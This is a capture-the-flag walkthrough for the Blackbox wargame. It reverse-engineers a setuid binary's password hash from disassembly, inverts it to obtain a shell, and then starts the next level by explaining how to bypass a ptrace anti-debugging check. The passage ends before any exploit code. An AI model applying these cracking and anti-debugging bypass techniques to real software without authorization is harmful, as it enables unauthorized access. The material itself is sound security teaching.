   184 08048703  C3                ret
   215 0804873F  C3                ret
   226 0804875A  C3                ret
~$ ndisasm -u -o 0x08048464 main.bin | head -n 124
08048464  55                push ebp
08048465  89E5              mov ebp,esp
08048467  53                push ebx
08048468  81EC34040000      sub esp,0x434
0804846E  83E4F0            and esp,byte -0x10
08048471  B800000000        mov eax,0x0
08048476  29C4              sub esp,eax
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
080484F3  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[ebp-0x41c]
08048501  8B85E4FBFFFF      mov eax,[ebp-0x41c]
08048507  0345F0            add eax,[ebp-0x10]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
08048516  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[ebp-0x41c]
08048524  8B85E4FBFFFF      mov eax,[ebp-0x41c]
0804852A  0345F0            add eax,[ebp-0x10]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
08048536  8D85EAFBFFFF      lea eax,[ebp-0x416]
0804853C  0385E4FBFFFF      add eax,[ebp-0x41c]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
0804854F  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [ebp-0x41c],eax
08048564  7205              jc 0x804856b
08048566  E99B000000        jmp dword 0x8048606
0804856B  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[ebp-0x41c]
08048579  8D85E8FBFFFF      lea eax,[ebp-0x418]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[ebp-0x41c]
08048587  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804858D  0385E4FBFFFF      add eax,[ebp-0x41c]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485A8  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[ebp-0x41c]
080485B6  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485BC  0385E4FBFFFF      add eax,[ebp-0x41c]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485D7  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[ebp-0x41c]
080485E5  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485EB  0385E4FBFFFF      add eax,[ebp-0x41c]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
080485F8  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
08048606  8D95E8FBFFFF      lea edx,[ebp-0x418]
0804860C  8B45F4            mov eax,[ebp-0xc]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
0804861F  C7042492870408    mov dword [esp],0x8048792
08048626  E85DFDFFFF        call dword 0x8048388
0804862B  C704249B870408    mov dword [esp],0x804879b
08048632  E811FDFFFF        call dword 0x8048348
08048637  EB0C              jmp short 0x8048645
08048639  C70424A3870408    mov dword [esp],0x80487a3
08048640  E843FDFFFF        call dword 0x8048388
08048645  B800000000        mov eax,0x0
0804864A  8B5DFC            mov ebx,[ebp-0x4]
0804864D  C9                leave
0804864E  C3                ret

I hope you don't mind that we switched from the gas syntax to the intel syntax, but it's good to learn to read both.
Anyway, since we disassembled raw code, we don't have any symbolic information, so we are going to have to guess what each function is from context. So let's start:

08048478  C745F464870408    mov dword [ebp-0xc],0x8048764

This loads the local variable at ebp-0xc with some constant which looks like an address in the data section. Let's use our tool again to read what's in that address.

level8@blackbox:/tmp$ ./wrap 0x08048764 10
555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377

See the 00 there? I suspect it is a string terminator, let's see what that string is:

level8@blackbox:/tmp$ python -c "print '%r' % '555b5b5a526357666358564d246c\
2223'.decode('hex')"
'U[[ZRcWfcXVM$l"#'

Odd string...seems like gibberish, we'll give ebp-0xc the name gibberish then. Let's continue, it might make more sense later:

0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax

This is a function call with one parameter, which also looks like an address in the data section:

level8@blackbox:/tmp$ ./wrap 0x08048775 10
506c6561736520656e74657220796f75722070617373776f72643a200057656c636f6d650a002f62

Again, I spot another string terminator, so let's decode the string:

level8@blackbox:/tmp$ python -c "print '%r' % '506c6561736520656e7465722079\
6f75722070617373776f72643a20'.decode('hex')"
'Please enter your password: '

Aha, a prompt. It also looks like the return value is stored in the stack at ebp-0x10. This means that this is not some regular printf or puts.
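
The two one-liners above rely on Python 2's str.decode('hex'). As a rough Python 3 sketch of the same idea (the helper name split_cstrings is made up for illustration), the whole dump can be cut at its NUL bytes in one go:

```python
def split_cstrings(hexdump: str) -> list:
    """Decode a hex dump and cut it at every NUL byte (the C string terminator)."""
    return bytes.fromhex(hexdump).split(b"\x00")


# First dump from above (address 0x08048764); the last piece is cut off by the dump size.
dump = "555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377"
pieces = split_cstrings(dump)
print(pieces[0])  # the gibberish string
print(pieces[1])  # the start of the prompt that follows it in memory
```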

0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000

That's some sort of initialization of a variable at ebp-0x41c.

08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3

This executes a mystery function on whatever was stored in ebp-0x10 (the return from that prompt function), subtracts 1 from the return value and compares the result to the variable at ebp-0x41c. Sort of like this:

if (var_41c >= (func(var_10) - 1)) goto 0x80484f3

Let's call that address label1 from now on, in case we see it again.

080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3

This compares var_41c to the constant 0x3fb, and jumps to some new location if it is below or equal, or to label1 otherwise. Equivalent C code:

if (var_41c <= 0x3fb) goto 0x80484ba
else goto label1

Let's call the new address label2.
For the next piece of code, notice it starts at label2, I'll just annotate it:

label2:
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498

What happens here is this, and you can verify it yourself:

var_418[var_41c] = var_10[var_41c + 1] - var_10[var_41c] + 0x5a;
var_41c++;

This tells us several things:

var_41c is some sort of index, from now on we will call it idx.
var_418 is some temporary buffer in the stack, we'll call it buf.
var_10, which was returned from the prompt function, is a pointer to some input, most probably the user input, and the prompt function is a prompt-and-read function. We will call it input.

At the end of that section, there's a jump to 0x8048498 which we will call label3. We've already been there, it's the piece that contained the mystery function. Let's rewrite it, but with more meaningful names and see if it sheds some new light:

if (idx >= (func(input) - 1)) goto label1
else if (idx <= 0x3fb) goto label2
else goto label1

I think we can spot what's happening here: the mystery function func is actually strlen, and this is part of a while statement:

while ((idx < strlen(input) - 1) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}
/* do label1 stuff */

OK, let's see what happens at label1 (I'm going to start annotating the code with variable names):

label1:
080484F3  8D85E8FBFFFF      lea eax,[buf]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[idx]
08048501  8B85E4FBFFFF      mov eax,[idx]
08048507  0345F0            add eax,[input]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al

This translates to:

buf[idx] = 0x21 + ((input[idx] >> 4) & 0xf);

The next chunk:

08048516  8D85E9FBFFFF      lea eax,[buf+1]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[idx]
08048524  8B85E4FBFFFF      mov eax,[idx]
0804852A  0345F0            add eax,[input]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al

Which translates to:

buf[idx + 1] = 0x21 + (input[idx] & 0xf);

Next we have:

08048536  8D85EAFBFFFF      lea eax,[buf+2]
0804853C  0385E4FBFFFF      add eax,[idx]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [idx],0x0
         -0000

This is equivalent to:

buf[idx + 2] = 0;
idx = 0;

This looks like something string-like was terminated, and the index was reset, probably for a second pass. Let's see what happens next:

0804854F  8D85E8FBFFFF      lea eax,[buf]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368 [strlen]
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [idx],eax
08048564  7205              jc 0x804856b [label4]
08048566  E99B000000        jmp dword 0x8048606 [label5]

Translated to C:

if (idx < strlen(buf) - 1) goto label4;
else goto label5;

The next piece of code starts at label4, and has a repeating pattern, so I'll paste it all at once:

label4:
0804856B  8D85E8FBFFFF      lea eax,[buf]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[idx]
08048579  8D85E8FBFFFF      lea eax,[buf]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[idx]
08048587  8D85E9FBFFFF      lea eax,[buf+1]
0804858D  0385E4FBFFFF      add eax,[idx]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[buf+1]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[idx]
080485A8  8D85E9FBFFFF      lea eax,[buf+1]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[idx]
080485B6  8D85E8FBFFFF      lea eax,[buf]
080485BC  0385E4FBFFFF      add eax,[idx]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[buf]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[idx]
080485D7  8D85E8FBFFFF      lea eax,[buf]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[idx]
080485E5  8D85E9FBFFFF      lea eax,[buf+1]
080485EB  0385E4FBFFFF      add eax,[idx]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al

Which is:

buf[idx] = buf[idx] ^ buf[idx + 1];
buf[idx + 1] = buf[idx] ^ buf[idx + 1];
buf[idx] = buf[idx] ^ buf[idx + 1];

That's just the code for swapping bytes.
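
If the XOR trick is new to you, here is a tiny Python 3 sketch of the same three steps on two plain integers (xor_swap is just an illustrative name, not something from the binary):

```python
def xor_swap(a: int, b: int) -> tuple:
    """Swap two values with three XORs, mirroring the three C statements."""
    a ^= b  # a now holds a0 ^ b0
    b ^= a  # b = b0 ^ (a0 ^ b0) = a0
    a ^= b  # a = (a0 ^ b0) ^ a0 = b0
    return a, b


print([hex(v) for v in xor_swap(0x55, 0x5b)])
```

Applying the swap twice gives back the original pair, which is why the same pass can later be used to undo itself.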
Next we have:

080485F8  8D85E4FBFFFF      lea eax,[idx]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f

Which increments the index by 2 and then jumps back to the index comparison, which makes it look like another loop:

for (idx = 0; idx < strlen(buf) - 1; idx += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Next is the code that gets executed when the loop is exhausted:

label5:
08048606  8D95E8FBFFFF      lea edx,[buf]
0804860C  8B45F4            mov eax,[gibberish]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639

I think by this time you've figured out what's happening here: gibberish is a password hash, what the program did so far is hash the input password, and this is where the two get compared.
I won't continue analyzing the code, because that's enough. Let's combine all the little pieces of C code and see what we can do:

while ((idx < strlen(input) - 1) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}

buf[idx] = 0x21 + ((input[idx] >> 4) & 0xf);
buf[idx + 1] = 0x21 + (input[idx] & 0xf);
buf[idx + 2] = 0;

for (idx = 0; idx < strlen(buf) - 1; idx += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}
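
For experimenting, here is a rough Python 3 transcription of the routine as read from the disassembly (loop bound strlen(input) - 1, nibbles masked before 0x21 is added). The name secrets_hash is made up, and the sketch ignores the C detail that strlen(buf) would stop early at a 0x00 byte inside buf:

```python
def secrets_hash(password: bytes) -> bytes:
    """Hash `password` the way the disassembled routine appears to."""
    if not password:
        raise ValueError("the routine reads input[idx], so an empty input is not modelled")
    buf = bytearray()
    # First pass: differences of neighbouring bytes, biased by 0x5a, at most 0x3fc of them.
    for idx in range(min(len(password) - 1, 0x3FC)):
        buf.append((password[idx + 1] - password[idx] + 0x5A) & 0xFF)
    # label1: the byte at the final idx is split into two nibbles, each offset by 0x21.
    last = password[len(buf)]
    buf.append(0x21 + ((last >> 4) & 0xF))
    buf.append(0x21 + (last & 0xF))
    # Second pass: swap every pair of neighbouring bytes.
    for idx in range(0, len(buf) - 1, 2):
        buf[idx], buf[idx + 1] = buf[idx + 1], buf[idx]
    return bytes(buf)


print(secrets_hash(b"abc"))  # made-up password, not the real one
```

Note that the result is always one byte longer than the input, so the 16-byte gibberish string corresponds to a 15-character password.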

Well, we know the hash function, and we know the hashed password. We can now invert the hash and obtain the original password.
That should be easy, working backwards:

Unswap every two consecutive bytes in the hash.
Take the last two bytes, subtract 0x21 from each, and recombine them into a single byte, the first being the high nibble and the second the low nibble. This gives us the last character of the input.
Reversing the formula for buf inside the while, we obtain a recurrence for the rest of the input, working from the end: input[i] = input[i + 1] - buf[i] + 0x5a.
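
If you get stuck, the three steps can be sketched in Python 3 roughly like this. The function name invert_hash is made up, and the demo input is the hash of a made-up password, not the real one:

```python
def invert_hash(hashed: bytes) -> bytes:
    """Undo the swap pass, rebuild the last byte from its nibbles, then walk backwards."""
    if len(hashed) < 2:
        raise ValueError("a hash is always at least two bytes long")
    buf = bytearray(hashed)
    # Step 1: swapping pairs again undoes the swap pass.
    for idx in range(0, len(buf) - 1, 2):
        buf[idx], buf[idx + 1] = buf[idx + 1], buf[idx]
    # Step 2: the last two bytes are the high and low nibble of the last input byte.
    n = len(buf) - 1  # length of the original input
    out = bytearray(n)
    out[n - 1] = (((buf[-2] - 0x21) & 0xF) << 4) | ((buf[-1] - 0x21) & 0xF)
    # Step 3: input[i] = input[i + 1] - buf[i] + 0x5a, from the end towards the start.
    for i in range(n - 2, -1, -1):
        out[i] = (out[i + 1] - buf[i] + 0x5A) & 0xFF
    return bytes(out)


print(invert_hash(b"[[$'"))  # hash of a made-up three-letter password
```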

I think I'll leave it to you to write a script and obtain the password yourselves.
I'll just check that it works:

level8@blackbox:~$ ./secrets
Please enter your password: 
Welcome
sh-3.1$

Just one last level to go ;)

Blackbox - chapter 7

$ ssh -p 2225 level7@blackbox.smashthestack.org
level7@blackbox.smashthestack.org's password:
...
level7@blackbox:~$ ls -l
total 12
-rwsr-xr-x 1 level8 level8 7851 2008-04-21 18:26 heybabe
-rw-r--r-- 1 root   level7   10 2008-01-24 05:56 passwd

No source, so like the previous time, let's start with dumping the data:

level7@blackbox:~$ objdump -s --section=.rodata heybabe

heybabe:     file format elf32-i386

Contents of section .rodata:
 80486b0 03000000 01000200 75736167 653a2025  ........usage: %
 80486c0 73203c61 72673e0a 00000000 54726163  s <arg>.....Trac
 80486d0 696e6720 64657465 63746564 203a2920  ing detected :) 
 80486e0 736f7272 79202e2e 2e2e2e00 544f5547  sorry ......TOUG
 80486f0 48205348 49542100 57616c6b 20746865  H SHIT!.Walk the
 8048700 20776179 206f6620 74686520 31333337   way of the 1337
 8048710 206f6e65 2100                         one!.

As before, I've colored the strings, and made a summary:

80486b8: usage: %s <arg>\n
80486cc: Tracing detected :) sorry .....
80486ec: TOUGH SHIT!
80486f8: Walk the way of the 1337 one!
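
The summary was made by hand, but it can also be scripted. Below is a rough Python 3 sketch that takes the address and hex columns of the dump above (the ASCII column is dropped on purpose) and lists every printable NUL-terminated string with its address. The helper name rodata_strings and the minimum length of 4 are arbitrary choices:

```python
RODATA = """\
80486b0 03000000 01000200 75736167 653a2025
80486c0 73203c61 72673e0a 00000000 54726163
80486d0 696e6720 64657465 63746564 203a2920
80486e0 736f7272 79202e2e 2e2e2e00 544f5547
80486f0 48205348 49542100 57616c6b 20746865
8048700 20776179 206f6620 74686520 31333337
8048710 206f6e65 2100
"""


def rodata_strings(dump: str, min_len: int = 4) -> dict:
    """Map address -> string for each printable NUL-terminated run in the dump."""
    lines = [line.split() for line in dump.splitlines() if line.strip()]
    base = int(lines[0][0], 16)  # assumes the lines are contiguous
    data = bytes.fromhex("".join("".join(fields[1:]) for fields in lines))
    found = {}
    start = 0
    for pos, byte in enumerate(data + b"\x00"):
        if byte == 0:
            chunk = data[start:pos]
            printable = all(32 <= c < 127 or c == 10 for c in chunk)
            if len(chunk) >= min_len and printable:
                found[base + start] = chunk.decode("ascii")
            start = pos + 1
    return found


for address, text in sorted(rodata_strings(RODATA).items()):
    print(hex(address), repr(text))
```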

Now we'll disassemble main:

level7@blackbox:~$ objdump -d heybabe|grep -A80 "<main>:"
08048464 <main>:
 8048464: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048468: 83 e4 f0              and    $0xfffffff0,%esp
 804846b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804846e: 55                    push   %ebp
 804846f: 89 e5                 mov    %esp,%ebp
 8048471: 57                    push   %edi
 8048472: 51                    push   %ecx
 8048473: 81 ec 10 04 00 00     sub    $0x410,%esp
 8048479: 89 8d 04 fc ff ff     mov    %ecx,0xfffffc04(%ebp)
 804847f: 8b 85 04 fc ff ff     mov    0xfffffc04(%ebp),%eax
 8048485: 83 38 02              cmpl   $0x2,(%eax)
 8048488: 74 27                 je     80484b1 <main+0x4d>
 804848a: 8b 95 04 fc ff ff     mov    0xfffffc04(%ebp),%edx
 8048490: 8b 42 04              mov    0x4(%edx),%eax
 8048493: 8b 00                 mov    (%eax),%eax
 8048495: 89 44 24 04           mov    %eax,0x4(%esp)
 8048499: c7 04 24 b8 86 04 08  movl   $0x80486b8,(%esp)
 80484a0: e8 cf fe ff ff        call   8048374 <printf@plt>
 80484a5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ac: e8 d3 fe ff ff        call   8048384 <exit@plt>
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

The first few lines, up to the cmpl & je should be familiar (if not, see the previous chapter for a detailed description) and mean first, that the address to the arguments is stored at ebp-0x3fc, and second, that the program expects exactly one argument.

The next lines are somewhat more tricky and important to this level:

 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>

The called function is ptrace, and it is called with the following parameters: ptrace(0, 0, 1, 0). Then the return value is tested for being non-negative (jns jumps if the sign flag is clear), and a jump is performed accordingly.
Now, what is this ptrace, what are the arguments, and why is it crucial for this level?
Well, ptrace is a system call, and we can find some documentation about it in the man pages (cropped for brevity and relevance, you can find the full man-pages by invoking man ptrace):

PTRACE(2)                 Linux Programmer's Manual                 PTRACE(2)

NAME
       ptrace - process trace

SYNOPSIS
       #include <sys/ptrace.h>

       long ptrace(enum __ptrace_request request, pid_t pid,
                   void *addr, void *data);

DESCRIPTION
       The  ptrace()  system  call provides a means by which a parent process
       may observe and control the execution of another process, and  examine
       and  change  its  core  image  and registers.  It is primarily used to
       implement breakpoint debugging and system call tracing.

       The parent can initiate a trace by  calling  fork(2)  and  having  the
       resulting  child  do  a  PTRACE_TRACEME,  followed  (typically)  by an
       exec(3).  Alternatively, the parent may commence trace of an  existing
       process using PTRACE_ATTACH.  (See additional notes below.)
...
       The value of request determines the action to be performed:

       PTRACE_TRACEME
              Indicates that this process is to be traced by its parent.  Any
              signal (except SIGKILL) delivered to this process will cause it
              to  stop  and its parent to be notified via wait(2).  Also, all
              subsequent calls to execve(2) by this process will cause a SIG‐
              TRAP  to be sent to it, giving the parent a chance to gain con‐
              trol before the new program begins execution.  A process proba‐
              bly  shouldn't  make this request if its parent isn't expecting
              to trace it.  (pid, addr, and data are ignored.)

       The above request is used only by the child process; the rest are used
       only  by  the  parent.   In  the following requests, pid specifies the
       child process to be acted on.  For requests  other  than  PTRACE_KILL,
       the child process must be stopped.
...
RETURN VALUE
       On  success,  PTRACE_PEEK*  requests  return the requested data, while
       other requests return zero.  On error, all  requests  return  -1,  and
       errno  is set appropriately.  Since the value returned by a successful
       PTRACE_PEEK* request may be -1, the caller must check errno after such
       requests to determine whether or not an error occurred.
...

OK, what can we learn from the man pages:

The ptrace system-call receives 4 parameters: a request code, a pid, an address pointer and a data pointer.
The request code used in our case is 0, which corresponds to PTRACE_TRACEME. What this request does is make the process behave in a traceable fashion, which involves, among other things, making it stop before any call to execve. Also, all the rest of the arguments are ignored.
The function returns -1 on failure.

So, if ptrace fails, it returns -1, which sets the sign flag in the test, so the jns branch is not taken and we go to:

 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>

That's just an error print and an exit.
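
The test/jns pair only looks at the sign bit of the return value. A minimal Python 3 model of that decision, with jns_taken being an illustrative name:

```python
def jns_taken(eax: int) -> bool:
    """Model `test %eax,%eax; jns`: the jump is taken when bit 31 (the sign bit) is clear."""
    return (eax & 0x80000000) == 0


for ret in (0, -1):
    eax = ret & 0xFFFFFFFF  # the return value as it sits in the 32-bit register
    outcome = "continue at 80484f1" if jns_taken(eax) else "print the error and exit"
    print(ret, "->", outcome)
```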
When will it fail? If the process is already being traced, which is what happens if we try to debug the program by running it in gdb. This can be averted by setting a breakpoint before the test instruction and changing the value of eax so that the test passes. This is not important for this level, but it's good to know.
The real important thing is, that since the process is in trace mode, we can't execute a shellcode that has an execve system call in it.
Bear that in mind as we continue to analyze the program.

 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax

